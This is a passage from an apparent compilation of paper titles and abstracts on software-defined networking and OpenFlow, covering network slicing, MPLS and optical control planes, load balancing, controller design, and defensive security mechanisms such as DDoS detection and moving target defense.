programmers typically resort to low-level mechanisms such as Virtual LANs, or they interpose complicated hypervisors into the control plane. This paper presents a better alternative: an abstraction that supports programming isolated slices of the network. The semantics of slices ensures that the processing of packets on a slice is independent of all other slices. We define our slice abstraction precisely, develop algorithms for compiling slices, and illustrate their use on examples. In addition, we describe a prototype implementation and a tool for automatically verifying formal isolation properties. --- paper_title: OMNI: OpenFlow MaNagement Infrastructure paper_content: Managing computer networks is challenging because of the numerous monitoring variables and the difficulty to autonomously configure network parameters. This paper presents the OpenFlow MaNagement Infrastructure (OMNI), which helps the administrator to control and manage OpenFlow networks by providing remote management based on a web interface. OMNI provides flow monitoring and dynamic flow configuration through a service-oriented architecture. OMNI also offers an Application Programming Interface (API) for collecting data and configuring the OpenFlow network. We propose a multi-agent system based on OMNI API that reduces packet loss rates. We evaluate both the OMNI management applications and the multi-agent system performance using a testbed. Our results show that the multi-agent system detects and reacts to a packet-loss condition in less than three monitoring intervals. --- paper_title: Hierarchical policies for software defined networks paper_content: Hierarchical policies are useful in many contexts in which resources are shared among multiple entities. Such policies can easily express the delegation of authority and the resolution of conflicts, which arise naturally when decision-making is decentralized. Conceptually, a hierarchical policy could be used to manage network resources, but commodity switches, which match packets using flow tables, do not realize hierarchies directly. This paper presents Hierarchical Flow Tables (HFT), a framework for specifying and realizing hierarchical policies in software defined networks. HFT policies are organized as trees, where each component of the tree can independently determine the action to take on each packet. When independent parts of the tree arrive at conflicting decisions, HFT resolves conflicts with user-defined conflict-resolution operators, which exist at each node of the tree. We present a compiler that realizes HFT policies on a distributed network of OpenFlow switches, and prove its correctness using the Coq proof assistant. We then evaluate the use of HFT to improve performance of networked applications. --- paper_title: Dynamic graph query primitives for SDN-based cloudnetwork management paper_content: The need to provide customers with the ability to configure the network in current cloud computing environments has motivated the Networking-as-a-Service (NaaS) systems designed for the cloud. Such systems can provide cloud customers access to virtual network functions, such as network-aware VM placement, real time network monitoring, diagnostics and management, all while supporting multiple device management protocols. These network management functionalities depend on a set of underlying graph primitives. In this paper, we present the design and implementation of the software architecture including a shared graph library that can support network management operations. Using the illustrative case of all pair shortest path algorithm, we demonstrate how scalable lightweight dynamic graph query mechanisms can be implemented to enable practical computation times, in presence of network dynamism. --- paper_title: Source address validation solution with OpenFlow/NOX architecture paper_content: Current Internet is lack of validation on source IP address, resulting in many security threats. The future Internet can face the similar routing locator spoofing problem without careful design. The current in-progress source address validation standard, i.e., SAVI, is not of enough protection due to the solution space constraint. In this article, a mechanism named VAVE is proposed to improve the SAVI solutions. VAVE employs OpenFlow protocol, which provides the de facto standard network innovation interface, to solve source address validation problem with a global view. Significant improvements can be found from our evaluation results. --- paper_title: Openflow random host mutation: transparent moving target defense using software defined networking paper_content: Static configurations serve great advantage for adversaries in discovering network targets and launching attacks. Identifying active IP addresses in a target domain is a precursory step for many attacks. Frequently changing hosts' IP addresses is a novel proactive moving target defense (MTD) that hides network assets from external/internal scanners. In this paper, we use OpenFlow to develop a MTD architecture that transparently mutates host IP addresses with high unpredictability and rate, while maintaining configuration integrity and minimizing operation overhead. The presented technique is called OpenFlow Random Host Mutation (OF-RHM) in which the OpenFlow controller frequently assigns each host a random virtual IP that is translated to/from the real IP of the host. The real IP remains untouched, so IP mutation is completely transparent for end-hosts. Named hosts are reachable via the virtual IP addresses acquired via DNS, but real IP addresses can be only reached by authorized entities. Our implementation and evaluation show that OF-RHM can effectively defend against stealthy scanning, worm propagation, and other scanning-based attack. --- paper_title: Splendid isolation: a slice abstraction for software-defined networks paper_content: The correct operation of many networks depends on keeping certain kinds of traffic isolated from others, but achieving isolation in networks today is far from straightforward. To achieve isolation, programmers typically resort to low-level mechanisms such as Virtual LANs, or they interpose complicated hypervisors into the control plane. This paper presents a better alternative: an abstraction that supports programming isolated slices of the network. The semantics of slices ensures that the processing of packets on a slice is independent of all other slices. We define our slice abstraction precisely, develop algorithms for compiling slices, and illustrate their use on examples. In addition, we describe a prototype implementation and a tool for automatically verifying formal isolation properties. --- paper_title: Lightweight DDoS flooding attack detection using NOX/OpenFlow paper_content: Distributed denial-of-service (DDoS) attacks became one of the main Internet security problems over the last decade, threatening public web servers in particular. Although the DDoS mechanism is widely understood, its detection is a very hard task because of the similarities between normal traffic and useless packets, sent by compromised hosts to their victims. This work presents a lightweight method for DDoS attack detection based on traffic flow features, in which the extraction of such information is made with a very low overhead compared to traditional approaches. This is possible due to the use of the NOX platform which provides a programmatic interface to facilitate the handling of switch information. Other major contributions include the high rate of detection and very low rate of false alarms obtained by flow analysis using Self Organizing Maps. --- paper_title: Design of the multi-level security network switch system which restricts covert channel paper_content: The administrator shall implement multilevel security policy in a multilevel security network system. The policy must ensure the information flow from low level host to the same level host or high level host, and prevent the information flow from high level host to low level host, but traditional network is difficult to meet the requirement. This paper proposes a design of multi-level security network switch system. The design adds a module named Filter based on OpenFlow. OpenFlow can control the packets flow of the network, and the Filter can check the packet's content and delay the packets then restrict covert channel. Using OpenFlow and the Filter, the system can implement the multilevel security policy in the scenario of local area network. The experiment verified the feasibility of the design. --- paper_title: Enabling fast failure recovery in OpenFlow networks paper_content: OpenFlow is a novel technology designed at Stanford University which aims at decoupling the controller software from the forwarding hardware of a router or switch. The OpenFlow concept is based on the approach that the forwarding information base (FIB) of a switch can be programmed via a controller which resides at a separate hardware. The goal is to provide a standardized open management interface to the forwarding hardware of a router or switch. The aim of a project SPARC “SPlit ARchitecture Carrier grade networks” is to deploy OpenFlow in carrier grade networks. Reliability is a major issue to deploy OpenFlow in this networks. This work proposes the addition of a fast restoration mechanism in OpenFlow and evaluates the performance by comparing the switchover time and packet loss to existing restoration options in a current OpenFlow implementation. --- paper_title: Openflow-based server load balancing gone wild paper_content: Today's data centers host online services on multiple servers, with a front-end load balancer directing each client request to a particular replica. Dedicated load balancers are expensive and quickly become a single point of failure and congestion. The OpenFlow standard enables an alternative approach where the commodity network switches divide traffic over the server replicas, based on packet-handling rules installed by a separate controller. However, the simple approach of installing a separate rule for each client connection (or "microflow") leads to a huge number of rules in the switches and a heavy load on the controller. We argue that the controller should exploit switch support for wildcard rules for a more scalable solution that directs large aggregates of client traffic to server replicas. We present algorithms that compute concise wildcard rules that achieve a target distribution of the traffic, and automatically adjust to changes in load-balancing policies without disrupting existing connections. We implement these algorithms on top of the NOX OpenFlow controller, evaluate their effectiveness, and propose several avenues for further research. --- paper_title: Software defined networking: Meeting carrier grade requirements paper_content: Software Defined Networking is a networking paradigm which allows network operators to manage networking elements using software running on an external server. This is accomplished by a split in the architecture between the forwarding element and the control element. Two technologies which allow this split for packet networks are For CES and Openflow. We present energy efficiency and resilience aspects of carrier grade networks which can be met by Openflow. We implement flow restoration and run extensive experiments in an emulated carrier grade network. We show that Openflow can restore traffic quite fast, but its dependency on a centralized controller means that it will be hard to achieve 50 ms restoration in large networks serving many flows. In order to achieve 50 ms recovery, protection will be required in carrier grade networks. --- paper_title: A security enforcement kernel for OpenFlow networks paper_content: Software-defined networks facilitate rapid and open innovation at the network control layer by providing a programmable network infrastructure for computing flow policies on demand. However, the dynamism of programmable networks also introduces new security challenges that demand innovative solutions. A critical challenge is efficient detection and reconciliation of potentially conflicting flow rules imposed by dynamic OpenFlow (OF) applications. To that end, we introduce FortNOX, a software extension that provides role-based authorization and security constraint enforcement for the NOX OpenFlow controller. FortNOX enables NOX to check flow rule contradictions in real time, and implements a novel analysis algorithm that is robust even in cases where an adversarial OF application attempts to strategically insert flow rules that would otherwise circumvent flow rules imposed by OF security applications. We demonstrate the utility of FortNOX through a prototype implementation and use it to examine performance and efficiency aspects of the proposed framework. --- paper_title: VeriFlow: verifying network-wide invariants in real time paper_content: Networks are complex and prone to bugs. Existing tools that check configuration files and data-plane state operate offline at timescales of seconds to hours, and cannot detect or prevent bugs as they arise. Is it possible to check network-wide invariants in real time, as the network state evolves? The key challenge here is to achieve extremely low latency during the checks so that network performance is not affected. In this paper, we present a preliminary design, VeriFlow, which suggests that this goal is achievable. VeriFlow is a layer between a software-defined networking controller and network devices that checks for network-wide invariant violations dynamically as each forwarding rule is inserted. Based on an implementation using a Mininet OpenFlow network and Route Views trace data, we find that VeriFlow can perform rigorous checking within hundreds of microseconds per rule insertion. --- paper_title: On the Flexibility of MPLS Applications over an OpenFlow-Enabled Network paper_content: In today's networks, a node usually has a static role that cannot be easily changed without an expensive upgrade. In MPLS architecture, despite the flexible forwarding data plane not tied to a single forwarding technology, each MPLS node has to be dedicated for a specific role depending on its position in the edge or the core of the MPLS network domain. This paper proposes an approach to address the flexibility of an MPLS node to play multiple roles for different MPLS domains built on top of an underlying OpenFlow-enabled physical network. The pipelined approach through tables introduced in the version 1.1 and later of the OpenFlow specification allows the change of the packet processing behavior by just updating the memory structures -- such as the TCAM and hash tables. It exploits the power of the OpenFlow rules-based paradigm to demonstrate the high level programmability to achieve the deossification of an MPLS infrastructure. In order to validate our proposal, we have implemented our approach over a 100Gbps switch box built on network processors and tested it with three applications to evaluate its flexibility. The results show that the local software to hardware update of a Label Switched Path (LSP) can be made in 2.2ms, in average, and the deployment of a Label Switched Router (LSR) application with 400 labels takes only 392.5ms. --- paper_title: Unifying Packet and Circuit Switched Networks paper_content: There have been many attempts to unify the control and management of circuit and packet switched networks, but none have taken hold. In this paper we propose a simple way to unify both types of network using OpenFlow. The basic idea is that a simple flow abstraction fits well with both types of network, provides a common paradigm for control, and makes it easy to insert new functionality into the network. OpenFlow provides a common API to the underlying hardware, and allows all of the routing, control and management to be defined in software outside the datapath. --- paper_title: Integrated OpenFlow — GMPLS control plane: An overlay model for software defined packet over optical networks paper_content: A novel software-defined packet over optical networks solution based on the OpenFlow and GMPLS control plane integration is demonstrated. The proposed architecture, experimental setup, and average flow setup time for different optical flows is reported. --- paper_title: OpenFlow MPLS and the open source label switched router paper_content: Multiprotocol Label Switching (MPLS) [3] is a protocol widely used in commercial operator networks to forward packets by matching link-specific labels in the packet header to outgoing links rather than through standard IP longest prefix matching. However, in existing networks, MPLS is implemented by full IP routers, since the MPLS control plane protocols such as LDP [8] utilize IP routing to set up the label switched paths, even though the MPLS data plane does not require IP routing. OpenFlow 1.0 is an interface for controlling a routing or switching box by inserting flow specifications into the box's flow table [1]. While OpenFlow 1.0 does not support MPLS1, MPLS label-based forwarding seems conceptually a good match with OpenFlow's flow-based routing paradigm. In this paper we describe the design and implementation of an experimental extension of OpenFlow 1.0 to support MPLS. The extension allows an OpenFlow switch without IP routing capability to forward MPLS on the data plane. We also describe the implementation of a prototype open source MPLS label switched router, based on the NetFPGA hardware platform [4], utilizing OpenFlow MPLS. The prototype is capable of forwarding data plane packets at line speed without IP forwarding, though IP forwarding is still used on the control plane. We provide some performance measurements comparing the prototype to software routers. The measurements indicate that the prototype is an appropriate tool for achieving line speed forwarding in testbeds and other experimental networks where flexibility is a key attribute, as a substitute for software routers. --- paper_title: Packet and circuit network convergence with OpenFlow paper_content: IP and Transport networks are controlled and operated independently today, leading to significant Capex and Opex inefficiencies for the providers. We discuss a unified approach with OpenFlow, and present a recent demonstration of a unified control plane for OpenFlow enabled IP/Ethernet and TDM switched networks. --- paper_title: Application-aware aggregation and traffic engineering in a converged packet-circuit network paper_content: We demonstrate a converged OpenFlow enabled packet-circuit network, where circuit flow properties (guarantee d bandwidth, low latency, low jitter, bandwidth-on-demand, fast recovery) provide differential treatment to dynamically aggregated packet flows for voice, video and web traffic. --- paper_title: MPLS with a simple OPEN control plane paper_content: We propose a new approach to MPLS that uses the standard MPLS data plane and an OpenFlow based simpler and extensible control plane. We demonstrate this approach using a prototype system for MPLS Traffic Engineering. --- paper_title: Why OpenFlow/SDN can succeed where GMPLS failed paper_content: OpenFlow & Software Defined Networking (SDN) ideas offer drastically reduced complexity in the control plane, increased programmability and extensibility, and a gradual adoption path; all significant advantages over GMPLS for dynamic interaction between packet and circuit networks. --- paper_title: Enabling the future optical Internet with OpenFlow: A paradigm shift in providing intelligent optical network services paper_content: This paper proposes an optical networking paradigm suitable for future Internet services enabled by OpenFlow. The OpenFlow technology supports the programmability of network functions and protocols by separating the data plane and the control plane, which are currently vertically integrated in routers and switches. OpenFlow facilitates fundamental changes in the behaviour of networks and their associated protocols. This paper introduces an OpenFlow optical network architecture enabled by optical flow, optical flow switching elements and programmable OpenFlow controllers. The proposed solution allows intelligent, user controlled and programmable optical network service provisioning with the capability to operate any user defined network protocol and scenario. --- paper_title: MPLS-TE and MPLS VPNS with openflow paper_content: We demonstrate MPLS Traffic Engineering (MPLS-TE) and MPLS-based Virtual Private Networks (MPLS VPNs) using OpenFlow [1] and NOX [6]. The demonstration is the outcome of an engineering experiment to answer the following questions: How hard is it to implement a complex control plane on top of a network controller such as NOX? Does the global vantage point in NOX make the implementation easier than the traditional method of implementing it on every switch, embedded in the data plane? We implemented every major feature of MPLS-TE and MPLS-VPN in just 2,000 lines of code, compared to much larger lines of code in the more traditional approach, such as Quagga-MPLS. Because NOX maintains a consistent, up-to-date topology map, the MPLS control plane features are quite simple to implement. And its simplicity makes it easy to extend: We have easily added several new features; something a network operator could do to customize their network to meet their customers' needs. ::: The demo consists of two parts: MPLS-TE services and then MPLS VPN driven by a GUI. --- paper_title: Hedera: Dynamic Flow Scheduling for Data Center Networks paper_content: Today's data centers offer tremendous aggregate bandwidth to clusters of tens of thousands of machines. However, because of limited port densities in even the highest-end switches, data center topologies typically consist of multi-rooted trees with many equal-cost paths between any given pair of hosts. Existing IP multipathing protocols usually rely on per-flow static hashing and can cause substantial bandwidth losses due to long-term collisions. ::: ::: In this paper, we present Hedera, a scalable, dynamic flow scheduling system that adaptively schedules a multi-stage switching fabric to efficiently utilize aggregate network resources. We describe our implementation using commodity switches and unmodified hosts, and show that for a simulated 8,192 host data center, Hedera delivers bisection bandwidth that is 96% of optimal and up to 113% better than static load-balancing methods. --- paper_title: An inter-AS routing component for software-defined networks paper_content: Network management is a challenging problem of wide impact with many enterprises suffering significant monetary losses, that can be of millions per hour, due to network issues, as downtime cost. The Software Defined Networks (SDN) approach is a new paradigm that enables the management of networks with low cost and complexity. The SDN architecture consists of a control plane, a forwarding plane and a protocol that enables communication with both planes. The control plane is composed by an Operating System and applications that run on top of it. The forwarding plane contains the switches, routers, and other network equipment. Nowadays, inter-domain routing system presents some critical problems, mainly due to its fully distributed model. Recent research has showed that it would be beneficial to apply the SDN approach to address some of those problems. But it became necessary to build a new mechanism to allow inter-domain routing using SDN. The aim of this paper is to present an inter-domain routing solution using a NOX-OpenFlow architecture, based on some characteristics of the today largely used inter-domain protocol, keeping the SDN architectural principles. Although NOX-OpenFlow was originally created for routing only in enterprise networks, we propose routing beyond those, lifting this undesirable restriction of the original architecture. Our tests show that the built of this kind of application provides a much less complex, less prone to errors, and scalable solution. --- paper_title: Unifying Packet and Circuit Switched Networks paper_content: There have been many attempts to unify the control and management of circuit and packet switched networks, but none have taken hold. In this paper we propose a simple way to unify both types of network using OpenFlow. The basic idea is that a simple flow abstraction fits well with both types of network, provides a common paradigm for control, and makes it easy to insert new functionality into the network. OpenFlow provides a common API to the underlying hardware, and allows all of the routing, control and management to be defined in software outside the datapath. --- paper_title: Application-aware aggregation and traffic engineering in a converged packet-circuit network paper_content: We demonstrate a converged OpenFlow enabled packet-circuit network, where circuit flow properties (guarantee d bandwidth, low latency, low jitter, bandwidth-on-demand, fast recovery) provide differential treatment to dynamically aggregated packet flows for voice, video and web traffic. --- paper_title: MPLS with a simple OPEN control plane paper_content: We propose a new approach to MPLS that uses the standard MPLS data plane and an OpenFlow based simpler and extensible control plane. We demonstrate this approach using a prototype system for MPLS Traffic Engineering. --- paper_title: Carving research slices out of your production networks with OpenFlow paper_content: 1. SLICED PROGRAMMABLE NETWORKS OpenFlow [4] has been demonstrated as a way for researchers to run networking experiments in their production network. Last year, we demonstrated how an OpenFlow controller running on NOX [3] could move VMs seamlessly around an OpenFlow network [1]. While OpenFlow has potential [2] to open control of the network, only one researcher can innovate on the network at a time. What is required is a way to divide, or slice, network resources so that researchers and network administrators can use them in parallel. Network slicing implies that actions in one slice do not negatively affect other slices, even if they share the same underlying physical hardware. A common network slicing technique is VLANs. With VLANs, the administrator partitions the network by switch port and all traffic is mapped to a VLAN by input port or explicit tag. This coarse-grained type of network slicing complicates more interesting experiments such as IP mobility or wireless handover. Here, we demonstrate FlowVisor, a special purpose OpenFlow controller that allows multiple researchers to run experiments safely and independently on the same production OpenFlow network. To motivate FlowVisor’s flexibility, we demonstrate four network slices running in parallel: one slice for the production network and three slices running experimental code (Figure 1). Our demonstration runs on real network hardware deployed on our production network at Stanford and a wide-area test-bed with a mix of wired and wireless technologies. --- paper_title: Delivering capacity for the mobile internet by stitching together networks paper_content: Despite of findings that only 5.2% of the spectrum from 30 MHz to 3 GHz is utilized, there is much talk of an impending spectrum crisis. This is no contradiction - spectrum is inefficiently utilized, with some part of the spectrum being heavily used while others barely used. In this paper, we explore a simple high-level approach to the problem: to enable user mobility across networks and exploit all the capacity available. By doing so, we can create a better mobile network by stitching together existing ones spanning multiple wireless technologies. We briefly outline our exploratory foray into radio agnostic handover and discuss the various challenges ahead. --- paper_title: PhoneNet: a phone-to-phone network for group communication within an administrative domain paper_content: This paper proposes PhoneNet, an application framework to support direct group communication among phones without relay nodes. PhoneNet presents the familiar abstraction of a multi-user chat service to application writers. It performs two main functions: inviting participants to the chat room and routing data between participants directly without going through any intermediaries. Made possible by a generic chat room service embedded in the network itself, all application-specific code in PhoneNet applications runs on the phones themselves. Unlike the conventional server-client model, this design does not require scalable central servers that can handle all simultaneous interactions. As a first step, we have created a prototype of PhoneNet that works within an administrative domain. The multicast functionality among phones is implemented on top of a software-defined network (SDN). We have developed two applications using PhoneNet: teleconferencing and photo-sharing. Our experience suggests that it is easy to develop PhoneNet applications and PhoneNet appears to be effective in reducing network traffic. --- paper_title: Towards programmable enterprise WLANS with Odin paper_content: We present Odin, an SDN framework to introduce programmability in enterprise wireless local area networks (WLANs). Enterprise WLANs need to support a wide range of services and functionalities. This includes authentication, authorization and accounting, policy, mobility and interference management, and load balancing. WLANs also exhibit unique challenges. In particular, access point (AP) association decisions are not made by the infrastructure, but by clients. In addition, the association state machine combined with the broadcast nature of the wireless medium requires keeping track of a large amount of state changes. To this end, Odin builds on a light virtual AP abstraction that greatly simplifies client management. Odin does not require any client side modifications and its design supports WPA2 Enterprise. With Odin, a network operator can implement enterprise WLAN services as network applications. A prototype implementation demonstrates Odin's feasibility. --- paper_title: The Stanford OpenRoads deployment paper_content: We have built and deployed OpenRoads [11], a testbed that allows multiple network experiments to be conducted concurrently in a production network. For example, multiple routing protocols, mobility managers and network access controllers can run simultaneously in the same network. In this paper, we describe and discuss our deployment of the testbed at Stanford University. We focus on the challenges we faced deploying in a production network, and the tools we built to overcome these challenges. Our goal is to gain enough experience for other groups to deploy OpenRoads in their campus network. --- paper_title: Blueprint for introducing innovation into wireless mobile networks paper_content: In the past couple of years we've seen quite a change in the wireless industry: Handsets have become mobile computers running user-contributed applications on (potentially) open operating systems. It seems we are on a path towards a more open ecosystem; one that has been previously closed and proprietary. The biggest winners are the users, who will have more choice among competing, innovative ideas. The same cannot be said for the wireless network infrastructure, which remains closed and (mostly) proprietary, and where innovation is bogged down by a glacial standards process. Yet as users, we are surrounded by abundant wireless capacity and multiple wireless networks (WiFi and cellular), with most of the capacity off-limits to us. It seems industry has little incentive to change, preferring to hold onto control as long as possible, keeping an inefficient and closed system in place. This paper is a "call to arms" to the research community to help move the network forward on a path to greater openness. We envision a world in which users can move freely between any wireless infrastructure, while providing payment to infrastructure owners, encouraging continued investment. We think the best path to get there is to separate the network service from the underlying physical infrastructure, and allow rapid innovation of network services, contributed by researchers, network operators, equipment vendors and third party developers. We propose to build and deploy an open - but backward compatible - wireless network infrastructure that can be easily deployed on college campuses worldwide. Through virtualization, we allow researchers to experiment with new network services directly in their production network. --- paper_title: OpenRadio: a programmable wireless dataplane paper_content: We present OpenRadio, a novel design for a programmable wireless dataplane that provides modular and declarative programming interfaces across the entire wireless stack. Our key conceptual contribution is a principled refactoring of wireless protocols into processing and decision planes. The processing plane includes directed graphs of algorithmic actions (eg. 54Mbps OFDM WiFi or special encoding for video). The decision plane contains the logic which dictates which directed graph is used for a particular packet (eg. picking between data and video graphs). The decoupling provides a declarative interface to program the platform while hiding all underlying complexity of execution. An operator only expresses decision plane rules and corresponding processing plane action graphs to assemble a protocol. The scoped interface allows us to build a dataplane that arguably provides the right tradeoff between performance and flexibility. Our current system is capable of realizing modern wireless protocols (WiFi, LTE) on off-the-shelf DSP chips while providing flexibility to modify the PHY and MAC layers to implement protocol optimizations. --- paper_title: OpenRoads: empowering research in mobile networks paper_content: We present OpenRoads, an open-source platform for innovation in mobile networks. OpenRoads enable researchers to innovate using their own production networks, through providing an wireless extension OpenFlow. Therefore, you can think of OpenRoads as "OpenFlow Wireless". The OpenRoads' architecture consists of three layers: flow, slicing and controller. These layers provide flexible control, virtualization and high-level abstraction. This allows researchers to implement wildly different algorithms and run them concurrently in one network. OpenRoads also incorporates multiple wireless technologies, specifically WiFi and WiMAX. We have deployed OpenRoads, and used it as our production network. Our goal here is for those to deploy OpenRoads and build their own experiments on it. --- paper_title: OpenFlow control for cooperating AQM scheme paper_content: OpenFlow is defined as a unified control plane and architecture for packet and circuit switched networks. We deal with the congestion control problem in the multi-layer network, and propose a cooperative congestion control scheme for a domain with multiple AQM routers based on the OpenFlow architecture. This scheme operates three different cases in the domain, where the domain server share information with core router and edge router interactively. Moreover, we use the OpenFlow to control atomic behaviors for packet handing within each switching element, which could manipulate such behaviors from a control server, thus users can program their own network behaviors by injecting their own control programs into the server. The congestion control algorithm is simulated to ensure the convergence of the average rate and throughout capacity to its equilibrium state when there are many high-rate flows in multilayer network. Finally, we compared its performance of the dropping probability and the queue length queue length with respect to the single router control results. --- paper_title: Virtual routers as a service: the RouteFlow approach leveraging software-defined networks paper_content: The networking equipment market is being transformed by the need for greater openness and flexibility, not only for research purposes but also for in-house innovation by the equipment owners. In contrast to networking gear following the model of computer mainframes, where closed software runs on proprietary hardware, the software-defined networking approach effectively decouples the data from the control plane via an open API (i.e., OpenFlow protocol) that allows the (remote) control of packet forwarding engines. Motivated by this scenario, we propose RouteFlow, a commodity routing architecture that combines the line-rate performance of commercial hardware with the flexibility of open-source routing stacks (remotely) running on general purpose computers. The outcome is a novel point in the design space of commodity routing solutions with far-reaching implications towards virtual routers and IP networks as a service. This paper documents the progress achieved in the design and prototype implementation of our work and outlines our research agenda that calls for a community-driven approach. --- paper_title: QuagFlow: partnering Quagga with OpenFlow paper_content: Computing history has shown that open, multi-layer hardware and software stacks encourage innovation and bring costs down. Only recently this trend is meeting the networking world with the availability of entire open source networking stacks being closer than ever. Towards this goal, we are working on QuagFlow, a transparent interplay between the popular Quagga open source routing suite and the low level vendor-independent OpenFlow interface. QuagFlow is a distributed system implemented as a NOX controller application and a series of slave daemons running along the virtual machines hosting the Quagga routing instances. --- paper_title: Scalable video streaming over OpenFlow networks: An optimization framework for QoS routing paper_content: OpenFlow is a clean-slate Future Internet architecture that decouples control and forwarding layers of routing, which has recently started being deployed throughout the world for research purposes. This paper presents an optimization framework for the OpenFlow controller in order to provide QoS support for scalable video streaming over an OpenFlow network. We pose and solve two optimization problems, where we route the base layer of SVC encoded video as a lossless-QoS flow, while the enhancement layers can be routed either as a lossy-QoS flow or as a best effort flow, respectively. The proposed approach differs from current QoS architectures since we provide dynamic rerouting capability possibly using non-shortest paths for lossless and lossy QoS flows. We show that dynamic rerouting of QoS flows achieves significant improvement on the video's overall PSNR under network congestion. --- paper_title: Revisiting routing control platforms with the eyes and muscles of software-defined networking paper_content: Prior work on centralized Routing Control Platform (RCP) has shown many benefits in flexible routing, enhanced security, and ISP connectivity management tasks. In this paper, we discuss RCPs in the context of OpenFlow/SDN, describing potential use cases and identifying deployment challenges and advantages. We propose a controller-centric hybrid networking model and present the design of the RouteFlow Control Platform (RFCP) along the prototype implementation of an AS-wide abstract BGP routing service. --- paper_title: Towards software-friendly networks paper_content: There has usually been a clean separation between networks and the applications that use them. Applications send packets over a simple socket API; the network delivers them. However, there are many occasions when applications can benefit from more direct interaction with the network: to observe more of the current network state and to obtain more control over the network behavior. This paper explores some of the potential benefits of closer interaction between applications and the network. Exploiting the emergence of so-called "software-defined networks" (SDN) built above network-wide control planes, we explore how to build a more "software-friendly network". We present results from a preliminary exploration that aims to provide network services to applications via an explicit communication channel. --- paper_title: B4: experience with a globally-deployed software defined wan paper_content: We present the design, implementation, and evaluation of B4, a private WAN connecting Google's data centers across the planet. B4 has a number of unique characteristics: i) massive bandwidth requirements deployed to a modest number of sites, ii) elastic traffic demand that seeks to maximize average bandwidth, and iii) full control over the edge servers and network, which enables rate limiting and demand measurement at the edge. These characteristics led to a Software Defined Networking architecture using OpenFlow to control relatively simple switches built from merchant silicon. B4's centralized traffic engineering service drives links to near 100% utilization, while splitting application flows among multiple paths to balance capacity against application priority/demands. We describe experience with three years of B4 production deployment, lessons learned, and areas for future work. --- paper_title: Modeling and performance evaluation of an OpenFlow architecture paper_content: The OpenFlow concept of flow-based forwarding and separation of the control plane from the data plane provides a new flexibility in network innovation. While initially used solely in the research domain, OpenFlow is now finding its way into commercial applications. However, this creates new challenges, as questions of OpenFlow scalability and performance have not yet been answered. This paper is a first step towards that goal. Based on measurements of switching times of current OpenFlow hardware, we derive a basic model for the forwarding speed and blocking probability of an OpenFlow switch combined with an OpenFlow controller and validate it using a simulation. This model can be used to estimate the packet sojourn time and the probability of lost packets in such a system and can give hints to developers and researchers on questions how an OpenFlow architecture will perform given certain parameters. --- paper_title: Logically centralized?: state distribution trade-offs in software defined networks paper_content: Software Defined Networks (SDN) give network designers freedom to refactor the network control plane. One core benefit of SDN is that it enables the network control logic to be designed and operated on a global network view, as though it were a centralized application, rather than a distributed system - logically centralized. Regardless of this abstraction, control plane state and logic must inevitably be physically distributed to achieve responsiveness, reliability, and scalability goals. Consequently, we ask: "How does distributed SDN state impact the performance of a logically centralized control application?" Motivated by this question, we characterize the state exchange points in a distributed SDN control plane and identify two key state distribution trade-offs. We simulate these exchange points in the context of an existing SDN load balancer application. We evaluate the impact of inconsistent global network view on load balancer performance and compare different state management approaches. Our results suggest that SDN control state inconsistency significantly degrades performance of logically centralized control applications agnostic to the underlying state distribution. --- paper_title: The controller placement problem paper_content: Network architectures such as Software-Defined Networks (SDNs) move the control logic off packet processing devices and onto external controllers. These network architectures with decoupled control planes open many unanswered questions regarding reliability, scalability, and performance when compared to more traditional purely distributed systems. This paper opens the investigation by focusing on two specific questions: given a topology, how many controllers are needed, and where should they go? To answer these questions, we examine fundamental limits to control plane propagation latency on an upcoming Internet2 production deployment, then expand our scope to over 100 publicly available WAN topologies. As expected, the answers depend on the topology. More surprisingly, one controller location is often sufficient to meet existing reaction-time requirements (though certainly not fault tolerance requirements). --- paper_title: Experimental validation and performance evaluation of OpenFlow-based wavelength path control in transparent optical networks. paper_content: OpenFlow, as an open-source protocol for network virtualization, is also widely regarded as a promising control plane technique for heterogeneous networks. But the utilization of the OpenFlow protocol to control a wavelength switched optical network has not been investigated. In this paper, for the first time, we experimentally present a proof-of-concept demonstration of OpenFlow-based wavelength path control for lightpath provisioning in transparent optical networks. We propose two different approaches (sequential and delayed approaches) for lightpath setup and two different approaches (active and passive approaches) for lightpath release by using the OpenFlow protocol. The overall feasibility of these approaches is experimentally validated and the network performances are quantitatively evaluated. More importantly, all the proposed methodologies are demonstrated and evaluated on a real transparent optical network testbed with both OpenFlow-based control plane and data plane, which allows their feasibility and effectiveness to be verified, and valuable insights of the proposed solutions to be obtained for deploying into real OpenFlow controlled optical networks. --- paper_title: OpenFlow Switching: Data Plane Performance paper_content: OpenFlow is an open standard that can be implemented in Ethernet switches, routers and wireless access points (AP). In the OpenFlow framework, packet forwarding (data plane) and routing decisions (control plane) run on different devices. OpenFlow switches are in charge of packet forwarding, whereas a controller set up switch forwarding table on a per-flow basis, to enable flow isolation and resource slicing. We focus on the data path and analyze the OpenFlow implementation in Linux based PCs. We compare OpenFlow switching, layer-2 Ethernet switching and layer-3 IP routing performance. Forwarding throughput and packet latency in underloaded and overloaded conditions are analyzed, with different traffic patterns. System scalability is analyzed using different forwarding table sizes, and fairness in resource distribution is measured. --- paper_title: Hey, you darned counters!: get off my ASIC! paper_content: Software-Defined Networking (SDN) gains much of its value through the use of central controllers with global views of dynamic network state. To support a global view, SDN protocols, such as OpenFlow, expose several counters for each flow-table rule. These counters must be maintained by the data plane, which is typically implemented in hardware as an ASIC. ASIC-based counters are inflexible, and cannot easily be modified to compute novel metrics. These counters do not need to be on the ASIC. If the ASIC data plane has a fast connection to a general-purpose CPU with cost-effective memory, we can replace traditional counters with a stream of rule-match records, transmit this stream to the CPU, and then process the stream in the CPU. These software-defined counters allow far more flexible processing of counter-related information, and can reduce the ASIC area and complexity needed to support counters. --- paper_title: HotSwap: correct and efficient controller upgrades for software-defined networks paper_content: Like any complex software, SDN programs must be updated periodically, whether to migrate to a new controller platform, repair bugs, or address performance issues. Nowadays, SDN operators typically perform such upgrades by stopping the old controller and starting the new one---an approach that wipes out all installed flow table entries and causes substantial disruption including losing packets, increasing latency, and even compromising correctness. This paper presents HotSwap, a system for upgrading SDN controllers in a disruption-free and correct manner. HotSwap is a hypervisor (sitting between the switches and the controller) that maintains a history of network events. To upgrade from an old controller to a new one, HotSwap bootstraps the new controller (by replaying the history) and monitors its output (to determine which parts of the network state may be reused with the new controller). To ensure good performance, HotSwap filters the history using queries specified by programmers. We describe our design and preliminary implementation of HotSwap, and present experimental results demonstrating its effectiveness for managing upgrades to third-party controller programs. --- paper_title: Kandoo: a framework for efficient and scalable offloading of control applications paper_content: Limiting the overhead of frequent events on the control plane is essential for realizing a scalable Software-Defined Network. One way of limiting this overhead is to process frequent events in the data 